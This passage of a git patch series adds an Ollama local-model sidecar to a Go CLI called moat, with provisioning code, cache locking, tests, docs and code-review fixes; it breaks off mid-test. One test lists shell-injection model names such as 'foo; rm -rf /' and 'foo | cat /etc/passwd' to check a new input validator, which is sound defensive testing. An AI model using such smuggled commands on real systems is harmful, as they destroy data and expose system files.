+ needsPassword := spec.Service.PasswordEnv != "" || serviceUsesPasswordPlaceholder(spec.Service) - // Set extra_env from registry with placeholder substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - v = strings.ReplaceAll(v, "{password}", password) - env[k] = v + // Only generate password for services that have auth + if needsPassword { + password, err := generatePassword() + if err != nil { + return container.ServiceConfig{}, err + } + if spec.Service.PasswordEnv != "" { + env[spec.Service.PasswordEnv] = password + } else { + env["password"] = password + } + + // Set extra_env from registry with placeholder substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v + } + } else { + // No auth — still apply extra_env without password substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + env[k] = v + } } // Apply user overrides @@ -137,16 +166,54 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv } } + // Resolve provisions from user spec Extra using registry's provisions_key + var provisions []string + if userSpec != nil && spec.Service.ProvisionsKey != "" { + provisions = userSpec.Extra[spec.Service.ProvisionsKey] + + // Validate: reject unknown Extra keys that don't match provisions_key + for key := range userSpec.Extra { + if key != spec.Service.ProvisionsKey { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid key (did you mean %q?)", + dep.Name, key, spec.Service.ProvisionsKey, + ) + } + } + } else if userSpec != nil && len(userSpec.Extra) > 0 { + // Service doesn't support provisions but user provided extra keys + for key := range userSpec.Extra { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid configuration key", 
+ dep.Name, key, + ) + } + } + + // Resolve cache host path + var cacheHostPath string + if spec.Service.CachePath != "" { + homeDir, err := os.UserHomeDir() + if err != nil { + return container.ServiceConfig{}, fmt.Errorf("resolving home directory for cache: %w", err) + } + cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) + } + return container.ServiceConfig{ - Name: dep.Name, - Version: dep.Version, - Env: env, - RunID: runID, - Image: spec.Service.Image, - Ports: spec.Service.Ports, - PasswordEnv: spec.Service.PasswordEnv, - ExtraCmd: spec.Service.ExtraCmd, - ReadinessCmd: spec.Service.ReadinessCmd, + Name: dep.Name, + Version: dep.Version, + Env: env, + RunID: runID, + Image: spec.Service.Image, + Ports: spec.Service.Ports, + PasswordEnv: spec.Service.PasswordEnv, + ExtraCmd: spec.Service.ExtraCmd, + ReadinessCmd: spec.Service.ReadinessCmd, + CachePath: spec.Service.CachePath, + CacheHostPath: cacheHostPath, + Provisions: provisions, + ProvisionCmd: spec.Service.ProvisionCmd, }, nil } diff --git a/internal/run/services_test.go b/internal/run/services_test.go index e25d9e21..0a8cbe15 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -143,3 +143,86 @@ func TestBuildServiceConfigUnknown(t *testing.T) { assert.Error(t, err) assert.Contains(t, err.Error(), "unknown service") } + +func TestBuildServiceConfigOllama(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b", "nomic-embed-text"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.NoError(t, err) + + assert.Equal(t, "ollama", cfg.Name) + assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "ollama/ollama", cfg.Image) + assert.Equal(t, 11434, cfg.Ports["default"]) + assert.Equal(t, "/root/.ollama", cfg.CachePath) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) + assert.Equal(t, 
[]string{"qwen2.5-coder:7b", "nomic-embed-text"}, cfg.Provisions) + + // Ollama has no auth — no password should be set + assert.Empty(t, cfg.Env) + assert.Empty(t, cfg.PasswordEnv) +} + +func TestBuildServiceConfigOllamaNoModels(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-ollama", nil) + require.NoError(t, err) + + assert.Empty(t, cfg.Provisions) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) +} + +func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + + _, hasPassword := cfg.Env["password"] + assert.False(t, hasPassword, "should not set phantom password for no-auth services") +} + +func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-pg", nil) + require.NoError(t, err) + + assert.NotEmpty(t, cfg.Env["POSTGRES_PASSWORD"], "postgres should still get a password") +} + +func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "model": {"qwen2.5-coder:7b"}, + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "model") +} + +func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "plugins": {"pg_trgm"}, + }, + } + + _, err := buildServiceConfig(dep, "run-pg", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "plugins") + 
assert.Contains(t, err.Error(), "not a valid") +} From b963ed5f1bc9eeed2f9911c9a8ec2ed63d489699 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:38:58 +0000 Subject: [PATCH 07/27] feat(run): add service provisioning with flock-based cache locking --- internal/run/manager.go | 32 ++++++++++++++++++++++++ internal/run/services.go | 46 +++++++++++++++++++++++++++++++++++ internal/run/services_test.go | 10 ++++++++ 3 files changed, 88 insertions(+) diff --git a/internal/run/manager.go b/internal/run/manager.go index 220c54a2..b0728714 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1878,6 +1878,7 @@ region = %s // Start services r.ServiceContainers = make(map[string]string) var serviceInfos []container.ServiceInfo + var svcConfigs []container.ServiceConfig cleanupServices := func() { for _, info := range serviceInfos { @@ -1904,6 +1905,21 @@ region = %s return nil, fmt.Errorf("configuring %s service: %w", dep.Name, err) } + svcConfigs = append(svcConfigs, svcCfg) + + // Create cache directory if needed + if svcCfg.CacheHostPath != "" { + if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o755); mkdirErr != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating cache directory for %s: %w", dep.Name, mkdirErr) + } + } + info, err := svcMgr.StartService(ctx, svcCfg) if err != nil { cleanupServices() @@ -1945,6 +1961,22 @@ region = %s "Or disable wait:\n services:\n %s:\n wait: false", dep.Name, err, r.ID, dep.Name, dep.Name) } + + // Provision items (e.g., pull models) if configured + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + cleanupServices() + cleanupDaemonRun() + 
cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s", + dep.Name, err, r.ID, dep.Name) + } + } } // Inject MOAT_* env vars diff --git a/internal/run/services.go b/internal/run/services.go index 608305d3..bbfac64e 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -4,11 +4,13 @@ import ( "context" "crypto/rand" "fmt" + "io" "math/big" "os" "path/filepath" "strconv" "strings" + "syscall" "time" "github.com/majorcontext/moat/internal/config" @@ -217,6 +219,50 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv }, nil } +const provisionTimeout = 30 * time.Minute + +// buildProvisionCmds creates concrete commands from a template and item list. +func buildProvisionCmds(cmdTemplate string, items []string) []string { + if len(items) == 0 { + return nil + } + cmds := make([]string, len(items)) + for i, item := range items { + cmds[i] = strings.ReplaceAll(cmdTemplate, "{item}", item) + } + return cmds +} + +// provisionService runs provision commands inside a started service container. +// Uses flock-based advisory locking on the cache directory to prevent concurrent +// corruption from parallel runs. +func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error { + cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions) + if len(cmds) == 0 { + return nil + } + + ctx, cancel := context.WithTimeout(ctx, provisionTimeout) + defer cancel() + + // Advisory lock on cache directory to prevent concurrent pull corruption. + // Cache directory is already created by the manager before starting the sidecar. 
+ if cfg.CacheHostPath != "" { + lockPath := filepath.Join(cfg.CacheHostPath, ".lock") + lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644) + if err != nil { + return fmt.Errorf("opening cache lock %s: %w", lockPath, err) + } + defer lockFile.Close() + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) + } + defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() + } + + return mgr.ProvisionService(ctx, info, cmds, stdout) +} + // waitForServiceReady polls CheckReady until success or timeout. func waitForServiceReady(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo) error { ctx, cancel := context.WithTimeout(ctx, readinessTimeout) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 0a8cbe15..2b31460e 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -226,3 +226,13 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { assert.Contains(t, err.Error(), "plugins") assert.Contains(t, err.Error(), "not a valid") } + +func TestBuildProvisionCmds(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) + assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) +} + +func TestBuildProvisionCmdsEmpty(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", nil) + assert.Empty(t, cmds) +} From d10e5cffb8955dafe6102fefd88708662724e9ef Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:39:31 +0000 Subject: [PATCH 08/27] docs(examples): add Ollama service dependency example --- examples/service-ollama/demo.sh | 17 +++++++++++++++++ examples/service-ollama/moat.yaml | 23 +++++++++++++++++++++++ 2 files changed, 40 insertions(+) create mode 100644 examples/service-ollama/demo.sh create mode 100644 
examples/service-ollama/moat.yaml diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh new file mode 100644 index 00000000..5060475f --- /dev/null +++ b/examples/service-ollama/demo.sh @@ -0,0 +1,17 @@ +#!/bin/sh +set -e + +echo "=== Ollama Service Demo ===" +echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" +echo + +echo "--- Available models ---" +curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200 +echo +echo + +echo "--- Generating response ---" +curl -s "$MOAT_OLLAMA_URL/api/generate" \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ + | head -c 500 +echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml new file mode 100644 index 00000000..dedf37d0 --- /dev/null +++ b/examples/service-ollama/moat.yaml @@ -0,0 +1,23 @@ +# Example: Ollama service dependency +# +# Demonstrates local model inference using Ollama as a service dependency. +# Moat starts an Ollama sidecar, pulls the declared model, and injects +# MOAT_OLLAMA_* environment variables into the agent container. +# +# Run with: +# moat run examples/service-ollama +# +# The demo script queries the Ollama API to list models and generate a response. 
+ +name: service-ollama + +dependencies: + - ollama@0.9 + - curl + +services: + ollama: + models: + - qwen2.5-coder:1.5b + +command: ["sh", "/workspace/demo.sh"] From 91425e67b495741d681f77141d02bcae0d4173ef Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:39:41 +0000 Subject: [PATCH 09/27] test(run): add env generation test for Ollama no-auth service --- internal/run/services_test.go | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 2b31460e..c00aa988 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -236,3 +236,29 @@ func TestBuildProvisionCmdsEmpty(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", nil) assert.Empty(t, cmds) } + +func TestGenerateServiceEnvOllama(t *testing.T) { + spec, ok := deps.GetSpec("ollama") + require.True(t, ok) + + info := container.ServiceInfo{ + Name: "ollama", + Host: "ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + } + + env := generateServiceEnv(spec.Service, info, nil) + + assert.Equal(t, "ollama", env["MOAT_OLLAMA_HOST"]) + assert.Equal(t, "11434", env["MOAT_OLLAMA_PORT"]) + assert.Equal(t, "http://ollama:11434", env["MOAT_OLLAMA_URL"]) + + // No auth — should not have password, user, or db + _, hasPassword := env["MOAT_OLLAMA_PASSWORD"] + assert.False(t, hasPassword, "should not inject password for no-auth services") + _, hasUser := env["MOAT_OLLAMA_USER"] + assert.False(t, hasUser) + _, hasDB := env["MOAT_OLLAMA_DB"] + assert.False(t, hasDB) +} From 94bcf312ce54edbad2a107c331591d76f7f6c60e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:40:29 +0000 Subject: [PATCH 10/27] docs: add Ollama service documentation and provisions pattern --- docs/content/guides/08-services.md | 33 ++++++++++++++++++++++- docs/content/reference/02-moat-yaml.md | 25 +++++++++++++++++ docs/content/reference/06-dependencies.md | 3 ++- 3 files 
changed, 59 insertions(+), 2 deletions(-) diff --git a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index dbd63d76..4cc4b4c7 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -2,7 +2,7 @@ title: "Service dependencies" navTitle: "Services" description: "Run ephemeral databases and caches alongside your agent containers." -keywords: ["moat", "postgres", "mysql", "redis", "database", "service", "sidecar"] +keywords: ["moat", "postgres", "mysql", "redis", "ollama", "database", "service", "sidecar"] --- # Service dependencies @@ -189,9 +189,40 @@ Each service has a built-in readiness command: | `postgres` | `pg_isready -h localhost -U postgres` | | `mysql` | `mysqladmin ping -h localhost -u root --password=` | | `redis` | `redis-cli -a PING` | +| `ollama` | `ollama list` + pull declared models | Readiness checks run inside the service container via `docker exec`. They verify that the service accepts connections with the generated credentials. +### Ollama (local models) + +Ollama provides local model inference without external API keys: + +```yaml +dependencies: + - ollama@0.9 + +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + +Models are pulled during startup and cached at `~/.moat/cache/ollama/` on the host. Subsequent runs skip the download. 
+ +```python +import requests +import os + +url = os.environ["MOAT_OLLAMA_URL"] +resp = requests.post(f"{url}/api/generate", json={ + "model": "qwen2.5-coder:7b", + "prompt": "Write hello world in Go", + "stream": False, +}) +print(resp.json()["response"]) +``` + ## Network architecture ```text diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index 986fff07..ecf91810 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -266,6 +266,7 @@ dependencies: | `mysql@8` | MySQL 8 | 3306 | | `mysql@9` | MySQL 9 | 3306 | | `redis@7` | Redis 7 | 6379 | +| `ollama@0.9` | Ollama | 11434 | Each service injects `MOAT_*` environment variables into the main container. See [Service environment variables](#service-environment-variables) for the full list. @@ -872,6 +873,24 @@ Each key matches a service name from `dependencies:` (e.g., `postgres`, `mysql`, Setting `wait: false` starts the main container without waiting for the service health check to pass. +### Service-specific lists + +Some services accept additional list configuration beyond `env` and `wait`. These keys are defined by the service's registry entry: + +| Service | Key | Purpose | +|---------|-----|---------| +| `ollama` | `models` | Models to pull during startup | + +Example: + +```yaml +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + ### Service environment variables Moat injects `MOAT_*` environment variables into the main container for each service dependency. Credentials are auto-generated per run. 
@@ -907,6 +926,12 @@ Moat injects `MOAT_*` environment variables into the main container for each ser | `MOAT_REDIS_PORT` | Port | `6379` | | `MOAT_REDIS_PASSWORD` | Auto-generated password | | +#### Ollama + +| Variable | Description | Example | +|----------|-------------|---------| +| `MOAT_OLLAMA_URL` | Base URL for the Ollama API | `http://ollama:11434` | + --- ## Claude Code diff --git a/docs/content/reference/06-dependencies.md b/docs/content/reference/06-dependencies.md index 43055502..75828579 100644 --- a/docs/content/reference/06-dependencies.md +++ b/docs/content/reference/06-dependencies.md @@ -121,7 +121,7 @@ See [Available services](#available-services) below for the full list, and the [ | Workflow tools | `graphite-cli` | Implied by `--grant graphite` | | Database clients | `psql`, `mysql-client`, `redis-cli`, `sqlite3` | Pair with corresponding service | | Cloud tools | `aws`, `gcloud`, `kubectl`, `terraform`, `helm` | | -| Services | `postgres`, `mysql`, `redis` | Run as sidecar containers | +| Services | `postgres`, `mysql`, `redis`, `ollama` | Run as sidecar containers | Run `moat deps list --type ` to filter by category. @@ -190,6 +190,7 @@ Both modes require Docker runtime. Apple containers do not support Docker socket | `postgres` | 17 | `MOAT_POSTGRES_*` | | `mysql` | 8 | `MOAT_MYSQL_*` | | `redis` | 7 | `MOAT_REDIS_*` | +| `ollama` | 0.9 | `MOAT_OLLAMA_URL` | Service dependencies require Docker or Apple container runtime. See the [service dependencies guide](../guides/08-services.md) for environment variable details, networking, and security information. 
From 6878451d710a0b8df686ccaade5172d871dc1aba Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:00:50 +0000 Subject: [PATCH 11/27] fix: address code review findings for Ollama sidecar (P1-P3) P1 fixes: - Validate provision items against regex to prevent shell injection via model names interpolated into sh -c commands - Fix error messages referencing nonexistent --service flag on moat logs P2 fixes: - Tighten cache directory permissions from 0755 to 0700 - Tighten lock file permissions from 0644 to 0600 - Change provision timeout from per-batch to per-item (30min each) - Narrow flock scope to per-item so parallel runs don't serialize P3 fixes: - Consolidate duplicated extra_env loop in buildServiceConfig - Capture unknown scalar keys in ServiceSpec YAML for validation - Add versions list and quote image in ollama registry entry --- compound-engineering.local.md | 9 +++ internal/config/config.go | 7 ++ internal/config/config_test.go | 14 ++++ internal/deps/registry.yaml | 3 +- internal/run/manager.go | 10 +-- internal/run/services.go | 79 +++++++++++++------ internal/run/services_test.go | 51 ++++++++++++ ...ng-p1-command-injection-provision-items.md | 79 +++++++++++++++++++ ...existent-service-flag-in-error-messages.md | 54 +++++++++++++ ...-pending-p2-cache-directory-permissions.md | 27 +++++++ ...-pending-p2-provision-timeout-per-batch.md | 37 +++++++++ ...ing-p2-flock-scope-blocks-parallel-runs.md | 42 ++++++++++ ...-pending-p2-provision-output-not-stored.md | 36 +++++++++ ...07-pending-p3-duplicated-extra-env-loop.md | 24 ++++++ ...8-pending-p3-silent-unknown-scalar-keys.md | 26 ++++++ ...9-pending-p3-registry-entry-consistency.md | 23 ++++++ 16 files changed, 493 insertions(+), 28 deletions(-) create mode 100644 compound-engineering.local.md create mode 100644 todos/001-pending-p1-command-injection-provision-items.md create mode 100644 todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md create mode 100644 
todos/003-pending-p2-cache-directory-permissions.md
 create mode 100644 todos/004-pending-p2-provision-timeout-per-batch.md
 create mode 100644 todos/005-pending-p2-flock-scope-blocks-parallel-runs.md
 create mode 100644 todos/006-pending-p2-provision-output-not-stored.md
 create mode 100644 todos/007-pending-p3-duplicated-extra-env-loop.md
 create mode 100644 todos/008-pending-p3-silent-unknown-scalar-keys.md
 create mode 100644 todos/009-pending-p3-registry-entry-consistency.md

diff --git a/compound-engineering.local.md b/compound-engineering.local.md
new file mode 100644
index 00000000..55a63512
--- /dev/null
+++ b/compound-engineering.local.md
@@ -0,0 +1,9 @@
+---
+review_agents:
+  - architecture-strategist
+  - security-sentinel
+  - performance-oracle
+  - pattern-recognition-specialist
+---
+
+Go CLI project (moat). Review for Go idioms, error handling, interface design, and test coverage.
diff --git a/internal/config/config.go b/internal/config/config.go
index 73e655a6..ec1af7ec 100644
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -187,6 +187,13 @@ func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error {
 				s.Extra = make(map[string][]string)
 			}
 			s.Extra[key] = items
+		} else {
+			// Capture unknown non-sequence keys with a nil value
+			// so the run layer can validate and reject them with useful errors.
+ if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = nil // nil signals "key present but not a list" } } return nil diff --git a/internal/config/config_test.go b/internal/config/config_test.go index 8140b90b..f89eda88 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -2336,3 +2336,17 @@ models: [] require.NoError(t, err) assert.Empty(t, spec.Extra["models"]) } + +func TestServiceSpecUnmarshalCapturesScalarKeys(t *testing.T) { + input := ` +env: + FOO: bar +typo_key: some_value +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + // Unknown scalar keys are captured in Extra with nil value + assert.Contains(t, spec.Extra, "typo_key") + assert.Nil(t, spec.Extra["typo_key"]) +} diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index da37a23c..dd508321 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -493,8 +493,9 @@ ollama: description: Ollama local model server type: service default: "0.9" + versions: ["0.6", "0.7", "0.8", "0.9"] service: - image: ollama/ollama + image: "ollama/ollama" ports: default: 11434 env_prefix: OLLAMA diff --git a/internal/run/manager.go b/internal/run/manager.go index b0728714..5a9df1ae 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1909,7 +1909,7 @@ region = %s // Create cache directory if needed if svcCfg.CacheHostPath != "" { - if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o755); mkdirErr != nil { + if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o700); mkdirErr != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) @@ -1957,9 +1957,9 @@ region = %s cleanupAgentConfig(codexConfig) cleanupAgentConfig(geminiConfig) return nil, fmt.Errorf("%s service failed to become ready: %w\n\n"+ - "Service container logs:\n moat logs %s --service %s\n\n"+ + "Check run logs:\n moat logs %s\n\n"+ "Or disable wait:\n services:\n %s:\n wait: false", - dep.Name, 
err, r.ID, dep.Name, dep.Name) + dep.Name, err, r.ID, dep.Name) } // Provision items (e.g., pull models) if configured @@ -1973,8 +1973,8 @@ region = %s cleanupAgentConfig(codexConfig) cleanupAgentConfig(geminiConfig) return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ - "Service container logs:\n moat logs %s --service %s", - dep.Name, err, r.ID, dep.Name) + "Check run logs:\n moat logs %s", + dep.Name, err, r.ID) } } } diff --git a/internal/run/services.go b/internal/run/services.go index bbfac64e..4c6a71cf 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -8,6 +8,7 @@ import ( "math/big" "os" "path/filepath" + "regexp" "strconv" "strings" "syscall" @@ -23,6 +24,12 @@ const passwordChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234 const readinessTimeout = 30 * time.Second const readinessInterval = 1 * time.Second +// validProvisionItem matches safe provision item names (e.g., Ollama model names). +// Allows alphanumerics, dots, dashes, underscores, colons, slashes, and @ signs. +// Rejects shell metacharacters (;, |, $, `, &, (, ), etc.) to prevent injection +// when items are interpolated into sh -c commands. +var validProvisionItem = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._:/@-]*$`) + // generatePassword creates a cryptographically random alphanumeric password. 
func generatePassword() (string, error) { b := make([]byte, passwordLength) @@ -136,8 +143,10 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv needsPassword := spec.Service.PasswordEnv != "" || serviceUsesPasswordPlaceholder(spec.Service) // Only generate password for services that have auth + var password string if needsPassword { - password, err := generatePassword() + var err error + password, err = generatePassword() if err != nil { return container.ServiceConfig{}, err } @@ -146,19 +155,14 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv } else { env["password"] = password } + } - // Set extra_env from registry with placeholder substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - v = strings.ReplaceAll(v, "{password}", password) - env[k] = v - } - } else { - // No auth — still apply extra_env without password substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - env[k] = v - } + // Set extra_env from registry with placeholder substitution. + // When password is empty, ReplaceAll is a no-op for {password}. + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v } // Apply user overrides @@ -182,6 +186,17 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv ) } } + + // Validate provision items to prevent shell injection. + // Items are interpolated into sh -c commands; reject shell metacharacters. 
+ for _, item := range provisions { + if !validProvisionItem.MatchString(item) { + return container.ServiceConfig{}, fmt.Errorf( + "invalid %s item %q: contains disallowed characters (must match %s)", + spec.Service.ProvisionsKey, item, validProvisionItem.String(), + ) + } + } } else if userSpec != nil && len(userSpec.Extra) > 0 { // Service doesn't support provisions but user provided extra keys for key := range userSpec.Extra { @@ -235,32 +250,52 @@ func buildProvisionCmds(cmdTemplate string, items []string) []string { // provisionService runs provision commands inside a started service container. // Uses flock-based advisory locking on the cache directory to prevent concurrent -// corruption from parallel runs. +// corruption from parallel runs. Each provision item gets its own timeout +// (provisionTimeout) rather than a single timeout for the entire batch. func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error { cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions) if len(cmds) == 0 { return nil } - ctx, cancel := context.WithTimeout(ctx, provisionTimeout) - defer cancel() - // Advisory lock on cache directory to prevent concurrent pull corruption. // Cache directory is already created by the manager before starting the sidecar. + var lockFile *os.File if cfg.CacheHostPath != "" { lockPath := filepath.Join(cfg.CacheHostPath, ".lock") - lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644) + var err error + lockFile, err = os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o600) if err != nil { return fmt.Errorf("opening cache lock %s: %w", lockPath, err) } defer lockFile.Close() - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - return fmt.Errorf("acquiring cache lock: %w", err) + } + + for _, cmd := range cmds { + // Per-item timeout: each provision command gets its own deadline. 
+ cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) + + // Acquire lock per-item so parallel runs pulling different items don't serialize. + if lockFile != nil { + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + cancel() + return fmt.Errorf("acquiring cache lock: %w", err) + } + } + + err := mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) + + if lockFile != nil { + _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) + } + cancel() + + if err != nil { + return err } - defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } - return mgr.ProvisionService(ctx, info, cmds, stdout) + return nil } // waitForServiceReady polls CheckReady until success or timeout. diff --git a/internal/run/services_test.go b/internal/run/services_test.go index c00aa988..af5c3bec 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -227,6 +227,57 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { assert.Contains(t, err.Error(), "not a valid") } +func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + tests := []struct { + name string + model string + }{ + {"semicolon", "foo; rm -rf /"}, + {"pipe", "foo | cat /etc/passwd"}, + {"dollar", "foo$(whoami)"}, + {"backtick", "foo`whoami`"}, + {"ampersand", "foo && echo pwned"}, + {"empty", ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {tt.model}, + }, + } + _, err := buildServiceConfig(dep, "run-test", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "disallowed characters") + }) + } +} + +func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + validModels := []string{ + "qwen2.5-coder:7b", + 
